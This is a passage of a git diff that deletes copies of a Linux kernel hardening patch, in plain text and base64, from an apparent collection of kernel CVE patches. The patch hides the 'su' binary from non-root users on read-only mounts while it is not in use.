-+++ b/include/linux/fs.h
-@@ -1538,6 +1538,7 @@
- struct dir_context {
- 	const filldir_t actor;
- 	loff_t pos;
-+	bool romnt;
- };
- 
- static inline bool dir_emit(struct dir_context *ctx,
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 9152f12..349a064 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -55,6 +55,12 @@
- 
- #include <asm/processor.h>
- 
-+int  su_instances(void);
-+bool su_running(void);
-+bool su_visible(void);
-+void su_exec(void);
-+void su_exit(void);
-+
- #define SCHED_ATTR_SIZE_VER0	48	/* sizeof first published struct */
- 
- /*
-@@ -1822,6 +1828,8 @@
- #define PF_FREEZER_SKIP	0x40000000	/* Freezer should not count it as freezable */
- #define PF_WAKE_UP_IDLE 0x80000000	/* try to wake up on an idle CPU */
- 
-+#define PF_SU		0x10000000      /* task is su */
-+
- /*
-  * Only the _current_ task can read/write to tsk->flags, but other
-  * tasks can access tsk->flags in readonly mode for example
-diff --git a/include/linux/uidgid.h b/include/linux/uidgid.h
-index 8e522cbc..cb4c867 100644
---- a/include/linux/uidgid.h
-+++ b/include/linux/uidgid.h
-@@ -64,6 +64,9 @@
- #define GLOBAL_ROOT_UID KUIDT_INIT(0)
- #define GLOBAL_ROOT_GID KGIDT_INIT(0)
- 
-+#define GLOBAL_SYSTEM_UID KUIDT_INIT(1000)
-+#define GLOBAL_SYSTEM_GID KGIDT_INIT(1000)
-+
- #define INVALID_UID KUIDT_INIT(-1)
- #define INVALID_GID KGIDT_INIT(-1)
- 
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 540bad4..e58c525 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -777,6 +777,10 @@
- 
- 	sched_exit(tsk);
- 
-+	if (tsk->flags & PF_SU) {
-+		su_exit();
-+	}
-+
- 	/*
- 	 * tsk->flags are checked in the futex code to protect against
- 	 * an exiting task cleaning up the robust pi futexes.
-diff --git a/kernel/fork.c b/kernel/fork.c
-index 924c17c..fc5b8c4 100644
---- a/kernel/fork.c
-+++ b/kernel/fork.c
-@@ -326,6 +326,8 @@
- 	if (err)
- 		goto free_ti;
- 
-+	tsk->flags &= ~PF_SU;
-+
- 	tsk->stack = ti;
- #ifdef CONFIG_SECCOMP
- 	/*
-diff --git a/kernel/sched/core.c b/kernel/sched/core.c
-index f888065..5f80d13 100644
---- a/kernel/sched/core.c
-+++ b/kernel/sched/core.c
-@@ -114,6 +114,38 @@
- 	local_irq_restore(dflags);			\
- } while (0)
- 
-+static atomic_t __su_instances;
-+
-+int su_instances(void)
-+{
-+	return atomic_read(&__su_instances);
-+}
-+
-+bool su_running(void)
-+{
-+	return su_instances() > 0;
-+}
-+
-+bool su_visible(void)
-+{
-+	kuid_t uid = current_uid();
-+	if (su_running())
-+		return true;
-+	if (uid_eq(uid, GLOBAL_ROOT_UID) || uid_eq(uid, GLOBAL_SYSTEM_UID))
-+		return true;
-+	return false;
-+}
-+
-+void su_exec(void)
-+{
-+	atomic_inc(&__su_instances);
-+}
-+
-+void su_exit(void)
-+{
-+	atomic_dec(&__su_instances);
-+}
-+
- const char *task_event_names[] = {"PUT_PREV_TASK", "PICK_NEXT_TASK",
- 				  "TASK_WAKE", "TASK_MIGRATE", "TASK_UPDATE",
- 				"IRQ_UPDATE"};
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch.base64
deleted file mode 100644
index 29786325..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.10/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSA5YmY1OGZlY2E3YzI5Y2NmZjg5YWJjZTRiNGZjZTMzOTRlYmFmNDM3IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBUb20gTWFyc2hhbGwgPHRkbS5jb2RlQGdtYWlsLmNvbT4KRGF0ZTogV2VkLCAyNSBKYW4gMjAxNyAxODowMTowMyArMDEwMApTdWJqZWN0OiBbUEFUQ0hdIGtlcm5lbDogT25seSBleHBvc2Ugc3Ugd2hlbiBkYWVtb24gaXMgcnVubmluZwoKSXQgaGFzIGJlZW4gY2xhaW1lZCB0aGF0IHRoZSBQRyBpbXBsZW1lbnRhdGlvbiBvZiAnc3UnIGhhcyBzZWN1cml0eQp2dWxuZXJhYmlsaXRpZXMgZXZlbiB3aGVuIGRpc2FibGVkLiAgVW5mb3J0dW5hdGVseSwgdGhlIHBlb3BsZSB0aGF0CmZpbmQgdGhlc2UgdnVsbmVyYWJpbGl0aWVzIG9mdGVuIGxpa2UgdG8ga2VlcCB0aGVtIHByaXZhdGUgc28gdGhleQpjYW4gcHJvZml0IGZyb20gZXhwbG9pdHMgd2hpbGUgbGVhdmluZyB1c2VycyBleHBvc2VkIHRvIG1hbGljaW91cwpoYWNrZXJzLgoKSW4gb3JkZXIgdG8gcmVkdWNlIHRoZSBhdHRhY2sgc3VyZmFjZSBmb3IgdnVsbmVyYWJpbGl0ZXMsIGl0IGlzCnRoZXJlZm9yZSBuZWNlc3NhcnkgdG8gbWFrZSAnc3UnIGNvbXBsZXRlbHkgaW5hY2Nlc3NpYmxlIHdoZW4gaXQKaXMgbm90IGluIHVzZSAoZXhjZXB0IGJ5IHRoZSByb290IGFuZCBzeXN0ZW0gdXNlcnMpLgoKQ2hhbmdlLUlkOiBJNzk3MTZjNzJmNzRkMGI3YWYzNGVjM2E4MDU0ODk2YzY1NTlhMTgxZAotLS0KCmRpZmYgLS1naXQgYS9mcy9leGVjLmMgYi9mcy9leGVjLmMKaW5kZXggMjI3ZWI5Mi4uNmYzOTY1YSAxMDA2NDQKLS0tIGEvZnMvZXhlYy5jCisrKyBiL2ZzL2V4ZWMuYwpAQCAtMTU2NCw2ICsxNTY0LDExIEBACiAJaWYgKHJldHZhbCA8IDApCiAJCWdvdG8gb3V0OwogCisJaWYgKGNhcGFibGUoQ0FQX1NZU19BRE1JTikgJiYgZF9pc19zdShmaWxlLT5mX2RlbnRyeSkpIHsKKwkJY3VycmVudC0+ZmxhZ3MgfD0gUEZfU1U7CisJCXN1X2V4ZWMoKTsKKwl9CisKIAkvKiBleGVjdmUgc3VjY2VlZGVkICovCiAJY3VycmVudC0+ZnMtPmluX2V4ZWMgPSAwOwogCWN1cnJlbnQtPmluX2V4ZWN2ZSA9IDA7CmRpZmYgLS1naXQgYS9mcy9uYW1laS5jIGIvZnMvbmFtZWkuYwppbmRleCA4MjdmMGViLi5hNTI0NTZjIDEwMDY0NAotLS0gYS9mcy9uYW1laS5jCisrKyBiL2ZzL25hbWVpLmMKQEAgLTIwMDAsNiArMjAwMCwxNCBAQAogCQl9CiAJfQogCisJaWYgKCFlcnIpIHsKKwkJc3RydWN0IHN1cGVyX2Jsb2NrICpzYiA9IG5kLT5pbm9kZS0+aV9zYjsKKwkJaWYgKHNiLT5zX2ZsYWdzICYgTVNfUkRPTkxZKSB7CisJCQlpZiAoZF9pc19zdShuZC0+cGF0aC5kZW50cnkpICYmICFzdV92aXNpYmxlKCkpCisJCQkJZXJyID0gLUVOT0VOVDsKKwkJfQorCX0KKwogCWlmIChiYXNlKQogCQlmcHV0KGJhc2UpOwogCmRpZmYgLS1naXQgYS9mcy9yZWFkZGlyLmMgYi9mcy9yZWFkZGlyLmMKaW5kZXggZDQ2ZWNhOC4uZDUyZDE4ZCAxMDA2NDQKLS0tIGEvZnMvcmVhZGRpci5jCisrKyBiL2ZzL3JlYWRkaXIuYwpAQCAtMzksNiArMzksNyBAQAogCWlmICghSVNfREVBRERJUihpbm9kZSkpIHsKIAkJaWYgKGZpbGUtPmZfb3AtPml0ZXJhdGUpIHsKIAkJCWN0eC0+cG9zID0gZmlsZS0+Zl9wb3M7CisJCQljdHgtPnJvbW50ID0gKGlub2RlLT5pX3NiLT5zX2ZsYWdzICYgTVNfUkRPTkxZKTsKIAkJCXJlcyA9IGZpbGUtPmZfb3AtPml0ZXJhdGUoZmlsZSwgY3R4KTsKIAkJCWZpbGUtPmZfcG9zID0gY3R4LT5wb3M7CiAJCX0gZWxzZSB7CkBAIC01Miw2ICs1MywxNCBAQAogCXJldHVybiByZXM7CiB9CiBFWFBPUlRfU1lNQk9MKGl0ZXJhdGVfZGlyKTsKKworc3RhdGljIGJvb2wgaGlkZV9uYW1lKGNvbnN0IGNoYXIgKm5hbWUsIGludCBuYW1sZW4pCit7CisJaWYgKG5hbWxlbiA9PSAyICYmICFtZW1jbXAobmFtZSwgInN1IiwgMikpCisJCWlmICghc3VfdmlzaWJsZSgpKQorCQkJcmV0dXJuIHRydWU7CisJcmV0dXJuIGZhbHNlOworfQogCiAvKgogICogVHJhZGl0aW9uYWwgbGludXggcmVhZGRpcigpIGhhbmRsaW5nLi4KQEAgLTkxLDYgKzEwMCw4IEBACiAJCWJ1Zi0+cmVzdWx0ID0gLUVPVkVSRkxPVzsKIAkJcmV0dXJuIC1FT1ZFUkZMT1c7CiAJfQorCWlmIChoaWRlX25hbWUobmFtZSwgbmFtbGVuKSAmJiBidWYtPmN0eC5yb21udCkKKwkJcmV0dXJuIDA7CiAJYnVmLT5yZXN1bHQrKzsKIAlkaXJlbnQgPSBidWYtPmRpcmVudDsKIAlpZiAoIWFjY2Vzc19vayhWRVJJRllfV1JJVEUsIGRpcmVudCwKQEAgLTE2OCw2ICsxNzksOCBAQAogCQlidWYtPmVycm9yID0gLUVPVkVSRkxPVzsKIAkJcmV0dXJuIC1FT1ZFUkZMT1c7CiAJfQorCWlmIChoaWRlX25hbWUobmFtZSwgbmFtbGVuKSAmJiBidWYtPmN0eC5yb21udCkKKwkJcmV0dXJuIDA7CiAJZGlyZW50ID0gYnVmLT5wcmV2aW91czsKIAlpZiAoZGlyZW50KSB7CiAJCWlmIChfX3B1dF91c2VyKG9mZnNldCwgJmRpcmVudC0+ZF9vZmYpKQpAQCAtMjQ2LDYgKzI1OSw4IEBACiAJYnVmLT5lcnJvciA9IC1FSU5WQUw7CS8qIG9ubHkgdXNlZCBpZiB3ZSBmYWlsLi4gKi8KIAlpZiAocmVjbGVuID4gYnVmLT5jb3VudCkKIAkJcmV0dXJuIC1FSU5WQUw7CisJaWYgKGhpZGVfbmFtZShuYW1lLCBuYW1sZW4pICYmIGJ1Zi0+Y3R4LnJvbW50KQorCQlyZXR1cm4gMDsKIAlkaXJlbnQgPSBidWYtPnByZXZpb3VzOwogCWlmIChkaXJlbnQpIHsKIAkJaWYgKF9fcHV0X3VzZXIob2Zmc2V0LCAmZGlyZW50LT5kX29mZikpCmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L2RjYWNoZS5oIGIvaW5jbHVkZS9saW51eC9kY2FjaGUuaAppbmRleCBmODRlMGVlLi41YjA0ZTE3IDEwMDY0NAotLS0gYS9pbmNsdWRlL2xpbnV4L2RjYWNoZS5oCisrKyBiL2luY2x1ZGUvbGludXgvZGNhY2hlLmgKQEAgLTQxMyw2ICs0MTMsMTEgQEAKIAlyZXR1cm4gZGVudHJ5LT5kX2ZsYWdzICYgRENBQ0hFX01PVU5URUQ7CiB9CiAKK3N0YXRpYyBpbmxpbmUgYm9vbCBkX2lzX3N1KGNvbnN0IHN0cnVjdCBkZW50cnkgKmRlbnRyeSkKK3sKKwlyZXR1cm4gZGVudHJ5LT5kX25hbWUubGVuID09IDIgJiYgIW1lbWNtcChkZW50cnktPmRfbmFtZS5uYW1lLCAic3UiLCAyKTsKK30KKwogZXh0ZXJuIGludCBzeXNjdGxfdmZzX2NhY2hlX3ByZXNzdXJlOwogCiAjZW5kaWYJLyogX19MSU5VWF9EQ0FDSEVfSCAqLwpkaWZmIC0tZ2l0IGEvaW5jbHVkZS9saW51eC9mcy5oIGIvaW5jbHVkZS9saW51eC9mcy5oCmluZGV4IDhhYWUwZWYuLmQwN2U1YTEgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvbGludXgvZnMuaAorKysgYi9pbmNsdWRlL2xpbnV4L2ZzLmgKQEAgLTE1MzgsNiArMTUzOCw3IEBACiBzdHJ1Y3QgZGlyX2NvbnRleHQgewogCWNvbnN0IGZpbGxkaXJfdCBhY3RvcjsKIAlsb2ZmX3QgcG9zOworCWJvb2wgcm9tbnQ7CiB9OwogCiBzdGF0aWMgaW5saW5lIGJvb2wgZGlyX2VtaXQoc3RydWN0IGRpcl9jb250ZXh0ICpjdHgsCmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L3NjaGVkLmggYi9pbmNsdWRlL2xpbnV4L3NjaGVkLmgKaW5kZXggOTE1MmYxMi4uMzQ5YTA2NCAxMDA2NDQKLS0tIGEvaW5jbHVkZS9saW51eC9zY2hlZC5oCisrKyBiL2luY2x1ZGUvbGludXgvc2NoZWQuaApAQCAtNTUsNiArNTUsMTIgQEAKIAogI2luY2x1ZGUgPGFzbS9wcm9jZXNzb3IuaD4KIAoraW50ICBzdV9pbnN0YW5jZXModm9pZCk7Citib29sIHN1X3J1bm5pbmcodm9pZCk7Citib29sIHN1X3Zpc2libGUodm9pZCk7Cit2b2lkIHN1X2V4ZWModm9pZCk7Cit2b2lkIHN1X2V4aXQodm9pZCk7CisKICNkZWZpbmUgU0NIRURfQVRUUl9TSVpFX1ZFUjAJNDgJLyogc2l6ZW9mIGZpcnN0IHB1Ymxpc2hlZCBzdHJ1Y3QgKi8KIAogLyoKQEAgLTE4MjIsNiArMTgyOCw4IEBACiAjZGVmaW5lIFBGX0ZSRUVaRVJfU0tJUAkweDQwMDAwMDAwCS8qIEZyZWV6ZXIgc2hvdWxkIG5vdCBjb3VudCBpdCBhcyBmcmVlemFibGUgKi8KICNkZWZpbmUgUEZfV0FLRV9VUF9JRExFIDB4ODAwMDAwMDAJLyogdHJ5IHRvIHdha2UgdXAgb24gYW4gaWRsZSBDUFUgKi8KIAorI2RlZmluZSBQRl9TVQkJMHgxMDAwMDAwMCAgICAgIC8qIHRhc2sgaXMgc3UgKi8KKwogLyoKICAqIE9ubHkgdGhlIF9jdXJyZW50XyB0YXNrIGNhbiByZWFkL3dyaXRlIHRvIHRzay0+ZmxhZ3MsIGJ1dCBvdGhlcgogICogdGFza3MgY2FuIGFjY2VzcyB0c2stPmZsYWdzIGluIHJlYWRvbmx5IG1vZGUgZm9yIGV4YW1wbGUKZGlmZiAtLWdpdCBhL2luY2x1ZGUvbGludXgvdWlkZ2lkLmggYi9pbmNsdWRlL2xpbnV4L3VpZGdpZC5oCmluZGV4IDhlNTIyY2JjLi5jYjRjODY3IDEwMDY0NAotLS0gYS9pbmNsdWRlL2xpbnV4L3VpZGdpZC5oCisrKyBiL2luY2x1ZGUvbGludXgvdWlkZ2lkLmgKQEAgLTY0LDYgKzY0LDkgQEAKICNkZWZpbmUgR0xPQkFMX1JPT1RfVUlEIEtVSURUX0lOSVQoMCkKICNkZWZpbmUgR0xPQkFMX1JPT1RfR0lEIEtHSURUX0lOSVQoMCkKIAorI2RlZmluZSBHTE9CQUxfU1lTVEVNX1VJRCBLVUlEVF9JTklUKDEwMDApCisjZGVmaW5lIEdMT0JBTF9TWVNURU1fR0lEIEtHSURUX0lOSVQoMTAwMCkKKwogI2RlZmluZSBJTlZBTElEX1VJRCBLVUlEVF9JTklUKC0xKQogI2RlZmluZSBJTlZBTElEX0dJRCBLR0lEVF9JTklUKC0xKQogCmRpZmYgLS1naXQgYS9rZXJuZWwvZXhpdC5jIGIva2VybmVsL2V4aXQuYwppbmRleCA1NDBiYWQ0Li5lNThjNTI1IDEwMDY0NAotLS0gYS9rZXJuZWwvZXhpdC5jCisrKyBiL2tlcm5lbC9leGl0LmMKQEAgLTc3Nyw2ICs3NzcsMTAgQEAKIAogCXNjaGVkX2V4aXQodHNrKTsKIAorCWlmICh0c2stPmZsYWdzICYgUEZfU1UpIHsKKwkJc3VfZXhpdCgpOworCX0KKwogCS8qCiAJICogdHNrLT5mbGFncyBhcmUgY2hlY2tlZCBpbiB0aGUgZnV0ZXggY29kZSB0byBwcm90ZWN0IGFnYWluc3QKIAkgKiBhbiBleGl0aW5nIHRhc2sgY2xlYW5pbmcgdXAgdGhlIHJvYnVzdCBwaSBmdXRleGVzLgpkaWZmIC0tZ2l0IGEva2VybmVsL2ZvcmsuYyBiL2tlcm5lbC9mb3JrLmMKaW5kZXggOTI0YzE3Yy4uZmM1YjhjNCAxMDA2NDQKLS0tIGEva2VybmVsL2ZvcmsuYworKysgYi9rZXJuZWwvZm9yay5jCkBAIC0zMjYsNiArMzI2LDggQEAKIAlpZiAoZXJyKQogCQlnb3RvIGZyZWVfdGk7CiAKKwl0c2stPmZsYWdzICY9IH5QRl9TVTsKKwogCXRzay0+c3RhY2sgPSB0aTsKICNpZmRlZiBDT05GSUdfU0VDQ09NUAogCS8qCmRpZmYgLS1naXQgYS9rZXJuZWwvc2NoZWQvY29yZS5jIGIva2VybmVsL3NjaGVkL2NvcmUuYwppbmRleCBmODg4MDY1Li41ZjgwZDEzIDEwMDY0NAotLS0gYS9rZXJuZWwvc2NoZWQvY29yZS5jCisrKyBiL2tlcm5lbC9zY2hlZC9jb3JlLmMKQEAgLTExNCw2ICsxMTQsMzggQEAKIAlsb2NhbF9pcnFfcmVzdG9yZShkZmxhZ3MpOwkJCVwKIH0gd2hpbGUgKDApCiAKK3N0YXRpYyBhdG9taWNfdCBfX3N1X2luc3RhbmNlczsKKworaW50IHN1X2luc3RhbmNlcyh2b2lkKQoreworCXJldHVybiBhdG9taWNfcmVhZCgmX19zdV9pbnN0YW5jZXMpOworfQorCitib29sIHN1X3J1bm5pbmcodm9pZCkKK3sKKwlyZXR1cm4gc3VfaW5zdGFuY2VzKCkgPiAwOworfQorCitib29sIHN1X3Zpc2libGUodm9pZCkKK3sKKwlrdWlkX3QgdWlkID0gY3VycmVudF91aWQoKTsKKwlpZiAoc3VfcnVubmluZygpKQorCQlyZXR1cm4gdHJ1ZTsKKwlpZiAodWlkX2VxKHVpZCwgR0xPQkFMX1JPT1RfVUlEKSB8fCB1aWRfZXEodWlkLCBHTE9CQUxfU1lTVEVNX1VJRCkpCisJCXJldHVybiB0cnVlOworCXJldHVybiBmYWxzZTsKK30KKwordm9pZCBzdV9leGVjKHZvaWQpCit7CisJYXRvbWljX2luYygmX19zdV9pbnN0YW5jZXMpOworfQorCit2b2lkIHN1X2V4aXQodm9pZCkKK3sKKwlhdG9taWNfZGVjKCZfX3N1X2luc3RhbmNlcyk7Cit9CisKIGNvbnN0IGNoYXIgKnRhc2tfZXZlbnRfbmFtZXNbXSA9IHsiUFVUX1BSRVZfVEFTSyIsICJQSUNLX05FWFRfVEFTSyIsCiAJCQkJICAiVEFTS19XQUtFIiwgIlRBU0tfTUlHUkFURSIsICJUQVNLX1VQREFURSIsCiAJCQkJIklSUV9VUERBVEUifTsK
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch b/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch
deleted file mode 100644
index a8e91130..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch
+++ /dev/null
@@ -1,246 +0,0 @@
-From 32c16ee3bef6a2d5edeb4e23bdb84e59a0387b3e Mon Sep 17 00:00:00 2001
-From: Tom Marshall <tdm.code@gmail.com>
-Date: Wed, 25 Jan 2017 18:01:03 +0100
-Subject: [PATCH] kernel: Only expose su when daemon is running
-
-It has been claimed that the PG implementation of 'su' has security
-vulnerabilities even when disabled.  Unfortunately, the people that
-find these vulnerabilities often like to keep them private so they
-can profit from exploits while leaving users exposed to malicious
-hackers.
-
-In order to reduce the attack surface for vulnerabilites, it is
-therefore necessary to make 'su' completely inaccessible when it
-is not in use (except by the root and system users).
-
-Change-Id: I79716c72f74d0b7af34ec3a8054896c6559a181d
----
-
-diff --git a/fs/exec.c b/fs/exec.c
-index b079500..e529a95 100644
---- a/fs/exec.c
-+++ b/fs/exec.c
-@@ -1537,6 +1537,11 @@
- 	if (retval < 0)
- 		goto out;
- 
-+	if (capable(CAP_SYS_ADMIN) && d_is_su(file->f_dentry)) {
-+		current->flags |= PF_SU;
-+		su_exec();
-+	}
-+
- 	/* execve succeeded */
- 	current->fs->in_exec = 0;
- 	current->in_execve = 0;
-diff --git a/fs/namei.c b/fs/namei.c
-index a14912e..e07a2dc 100644
---- a/fs/namei.c
-+++ b/fs/namei.c
-@@ -2025,6 +2025,14 @@
- 		}
- 	}
- 
-+	if (!err) {
-+		struct super_block *sb = nd->inode->i_sb;
-+		if (sb->s_flags & MS_RDONLY) {
-+			if (d_is_su(nd->path.dentry) && !su_visible())
-+				err = -ENOENT;
-+		}
-+	}
-+
- out:
- 	if (base)
- 		fput(base);
-diff --git a/fs/readdir.c b/fs/readdir.c
-index 33fd922..b3089a1 100644
---- a/fs/readdir.c
-+++ b/fs/readdir.c
-@@ -39,6 +39,7 @@
- 	res = -ENOENT;
- 	if (!IS_DEADDIR(inode)) {
- 		ctx->pos = file->f_pos;
-+		ctx->romnt = (inode->i_sb->s_flags & MS_RDONLY);
- 		res = file->f_op->iterate(file, ctx);
- 		file->f_pos = ctx->pos;
- 		fsnotify_access(file);
-@@ -49,6 +50,14 @@
- 	return res;
- }
- EXPORT_SYMBOL(iterate_dir);
-+
-+static bool hide_name(const char *name, int namlen)
-+{
-+	if (namlen == 2 && !memcmp(name, "su", 2))
-+		if (!su_visible())
-+			return true;
-+	return false;
-+}
- 
- /*
-  * Traditional linux readdir() handling..
-@@ -88,6 +97,8 @@
- 		buf->result = -EOVERFLOW;
- 		return -EOVERFLOW;
- 	}
-+	if (hide_name(name, namlen) && buf->ctx.romnt)
-+		return 0;
- 	buf->result++;
- 	dirent = buf->dirent;
- 	if (!access_ok(VERIFY_WRITE, dirent,
-@@ -165,6 +176,8 @@
- 		buf->error = -EOVERFLOW;
- 		return -EOVERFLOW;
- 	}
-+	if (hide_name(name, namlen) && buf->ctx.romnt)
-+		return 0;
- 	dirent = buf->previous;
- 	if (dirent) {
- 		if (__put_user(offset, &dirent->d_off))
-@@ -243,6 +256,8 @@
- 	buf->error = -EINVAL;	/* only used if we fail.. */
- 	if (reclen > buf->count)
- 		return -EINVAL;
-+	if (hide_name(name, namlen) && buf->ctx.romnt)
-+		return 0;
- 	dirent = buf->previous;
- 	if (dirent) {
- 		if (__put_user(offset, &dirent->d_off))
-diff --git a/include/linux/dcache.h b/include/linux/dcache.h
-index 3cf440f..16bca1a 100644
---- a/include/linux/dcache.h
-+++ b/include/linux/dcache.h
-@@ -465,6 +465,11 @@
- 	return !d_is_negative(dentry);
- }
- 
-+static inline bool d_is_su(const struct dentry *dentry)
-+{
-+	return dentry->d_name.len == 2 && !memcmp(dentry->d_name.name, "su", 2);
-+}
-+
- extern int sysctl_vfs_cache_pressure;
- 
- static inline unsigned long vfs_pressure_ratio(unsigned long val)
-diff --git a/include/linux/fs.h b/include/linux/fs.h
-index 06334de..755a391 100644
---- a/include/linux/fs.h
-+++ b/include/linux/fs.h
-@@ -1495,6 +1495,7 @@
- struct dir_context {
- 	const filldir_t actor;
- 	loff_t pos;
-+	bool romnt;
- };
- 
- struct block_device_operations;
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index 353a291..83af519 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -61,6 +61,12 @@
- 
- #include <asm/processor.h>
- 
-+int  su_instances(void);
-+bool su_running(void);
-+bool su_visible(void);
-+void su_exec(void);
-+void su_exit(void);
-+
- #define SCHED_ATTR_SIZE_VER0	48	/* sizeof first published struct */
- 
- /*
-@@ -2073,6 +2079,8 @@
- #define PF_FREEZER_SKIP	0x40000000	/* Freezer should not count it as freezable */
- #define PF_SUSPEND_TASK 0x80000000      /* this thread called freeze_processes and should not be frozen */
- 
-+#define PF_SU		0x10000000      /* task is su */
-+
- /*
-  * Only the _current_ task can read/write to tsk->flags, but other
-  * tasks can access tsk->flags in readonly mode for example
-diff --git a/include/linux/uidgid.h b/include/linux/uidgid.h
-index 2d1f9b6..ef26f3f 100644
---- a/include/linux/uidgid.h
-+++ b/include/linux/uidgid.h
-@@ -42,6 +42,9 @@
- #define GLOBAL_ROOT_UID KUIDT_INIT(0)
- #define GLOBAL_ROOT_GID KGIDT_INIT(0)
- 
-+#define GLOBAL_SYSTEM_UID KUIDT_INIT(1000)
-+#define GLOBAL_SYSTEM_GID KGIDT_INIT(1000)
-+
- #define INVALID_UID KUIDT_INIT(-1)
- #define INVALID_GID KGIDT_INIT(-1)
- 
-diff --git a/kernel/exit.c b/kernel/exit.c
-index 31003c7..d3a962e 100644
---- a/kernel/exit.c
-+++ b/kernel/exit.c
-@@ -730,6 +730,10 @@
- 
- 	sched_exit(tsk);
- 
-+	if (tsk->flags & PF_SU) {
-+		su_exit();
-+	}
-+
- 	/*
- 	 * tsk->flags are checked in the futex code to protect against
- 	 * an exiting task cleaning up the robust pi futexes.
-diff --git a/kernel/fork.c b/kernel/fork.c
-index 600956b..390dbc3 100644
---- a/kernel/fork.c
-+++ b/kernel/fork.c
-@@ -339,6 +339,8 @@
- 	if (err)
- 		goto free_ti;
- 
-+	tsk->flags &= ~PF_SU;
-+
- 	tsk->stack = ti;
- #ifdef CONFIG_SECCOMP
- 	/*
-diff --git a/kernel/sched/core.c b/kernel/sched/core.c
-index e7d3367..74b268f4 100644
---- a/kernel/sched/core.c
-+++ b/kernel/sched/core.c
-@@ -96,6 +96,38 @@
- #define CREATE_TRACE_POINTS
- #include <trace/events/sched.h>
- 
-+static atomic_t __su_instances;
-+
-+int su_instances(void)
-+{
-+	return atomic_read(&__su_instances);
-+}
-+
-+bool su_running(void)
-+{
-+	return su_instances() > 0;
-+}
-+
-+bool su_visible(void)
-+{
-+	kuid_t uid = current_uid();
-+	if (su_running())
-+		return true;
-+	if (uid_eq(uid, GLOBAL_ROOT_UID) || uid_eq(uid, GLOBAL_SYSTEM_UID))
-+		return true;
-+	return false;
-+}
-+
-+void su_exec(void)
-+{
-+	atomic_inc(&__su_instances);
-+}
-+
-+void su_exit(void)
-+{
-+	atomic_dec(&__su_instances);
-+}
-+
- const char *task_event_names[] = {"PUT_PREV_TASK", "PICK_NEXT_TASK",
- 				  "TASK_WAKE", "TASK_MIGRATE", "TASK_UPDATE",
- 				"IRQ_UPDATE"};
diff --git a/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch.base64 b/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch.base64
deleted file mode 100644
index adf81058..00000000
--- a/Patches/Linux_CVEs/LVT-2017-0001/3.18/0004.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAzMmMxNmVlM2JlZjZhMmQ1ZWRlYjRlMjNiZGI4NGU1OWEwMzg3YjNlIE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBUb20gTWFyc2hhbGwgPHRkbS5jb2RlQGdtYWlsLmNvbT4KRGF0ZTogV2VkLCAyNSBKYW4gMjAxNyAxODowMTowMyArMDEwMApTdWJqZWN0OiBbUEFUQ0hdIGtlcm5lbDogT25seSBleHBvc2Ugc3Ugd2hlbiBkYWVtb24gaXMgcnVubmluZwoKSXQgaGFzIGJlZW4gY2xhaW1lZCB0aGF0IHRoZSBQRyBpbXBsZW1lbnRhdGlvbiBvZiAnc3UnIGhhcyBzZWN1cml0eQp2dWxuZXJhYmlsaXRpZXMgZXZlbiB3aGVuIGRpc2FibGVkLiAgVW5mb3J0dW5hdGVseSwgdGhlIHBlb3BsZSB0aGF0CmZpbmQgdGhlc2UgdnVsbmVyYWJpbGl0aWVzIG9mdGVuIGxpa2UgdG8ga2VlcCB0aGVtIHByaXZhdGUgc28gdGhleQpjYW4gcHJvZml0IGZyb20gZXhwbG9pdHMgd2hpbGUgbGVhdmluZyB1c2VycyBleHBvc2VkIHRvIG1hbGljaW91cwpoYWNrZXJzLgoKSW4gb3JkZXIgdG8gcmVkdWNlIHRoZSBhdHRhY2sgc3VyZmFjZSBmb3IgdnVsbmVyYWJpbGl0ZXMsIGl0IGlzCnRoZXJlZm9yZSBuZWNlc3NhcnkgdG8gbWFrZSAnc3UnIGNvbXBsZXRlbHkgaW5hY2Nlc3NpYmxlIHdoZW4gaXQKaXMgbm90IGluIHVzZSAoZXhjZXB0IGJ5IHRoZSByb290IGFuZCBzeXN0ZW0gdXNlcnMpLgoKQ2hhbmdlLUlkOiBJNzk3MTZjNzJmNzRkMGI3YWYzNGVjM2E4MDU0ODk2YzY1NTlhMTgxZAotLS0KCmRpZmYgLS1naXQgYS9mcy9leGVjLmMgYi9mcy9leGVjLmMKaW5kZXggYjA3OTUwMC4uZTUyOWE5NSAxMDA2NDQKLS0tIGEvZnMvZXhlYy5jCisrKyBiL2ZzL2V4ZWMuYwpAQCAtMTUzNyw2ICsxNTM3LDExIEBACiAJaWYgKHJldHZhbCA8IDApCiAJCWdvdG8gb3V0OwogCisJaWYgKGNhcGFibGUoQ0FQX1NZU19BRE1JTikgJiYgZF9pc19zdShmaWxlLT5mX2RlbnRyeSkpIHsKKwkJY3VycmVudC0+ZmxhZ3MgfD0gUEZfU1U7CisJCXN1X2V4ZWMoKTsKKwl9CisKIAkvKiBleGVjdmUgc3VjY2VlZGVkICovCiAJY3VycmVudC0+ZnMtPmluX2V4ZWMgPSAwOwogCWN1cnJlbnQtPmluX2V4ZWN2ZSA9IDA7CmRpZmYgLS1naXQgYS9mcy9uYW1laS5jIGIvZnMvbmFtZWkuYwppbmRleCBhMTQ5MTJlLi5lMDdhMmRjIDEwMDY0NAotLS0gYS9mcy9uYW1laS5jCisrKyBiL2ZzL25hbWVpLmMKQEAgLTIwMjUsNiArMjAyNSwxNCBAQAogCQl9CiAJfQogCisJaWYgKCFlcnIpIHsKKwk